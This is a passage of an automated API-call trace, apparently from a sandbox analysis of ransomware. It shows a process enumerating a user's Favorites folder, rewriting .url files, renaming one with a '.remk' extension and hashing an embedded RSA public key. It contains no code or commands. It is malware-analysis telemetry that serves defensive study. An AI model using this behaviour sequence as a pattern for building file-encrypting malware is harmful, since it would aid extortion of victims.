hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5c8 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5b0 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee610 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5b0 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee5b0 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5c8 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5e0 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee610 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0233.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5b0 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5f8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbc90 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.935] WriteFile (in: hFile=0x640, lpBuffer=0x65e698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x65e698*, lpNumberOfBytesWritten=0x3adfb14*=0x80, lpOverlapped=0x0) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0233.935] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.935] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0233.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.936] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.936] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.936] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.936] CloseHandle (hObject=0x640) returned 1 [0233.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0233.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0233.938] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.remk")) returned 1 [0233.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0233.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.939] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.941] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0233.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.941] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0233.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.942] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.942] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.945] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.945] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.946] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.946] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.947] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.947] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.947] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.948] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.948] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.948] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.948] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.948] GetLastError () returned 0x0 [0233.948] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.948] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.948] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.948] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.948] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.948] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbc90 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbcd8 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5b0 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.949] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5b0 | out: hHeap=0x630000) returned 1 [0233.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5f8 | out: hHeap=0x630000) returned 1 [0233.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee5b0 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee598 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5b0 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5f8 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.950] GetCurrentThreadId () returned 0x314 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c25f0 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.951] GetCurrentThreadId () returned 0x314 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0233.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.952] HeapFree (in: 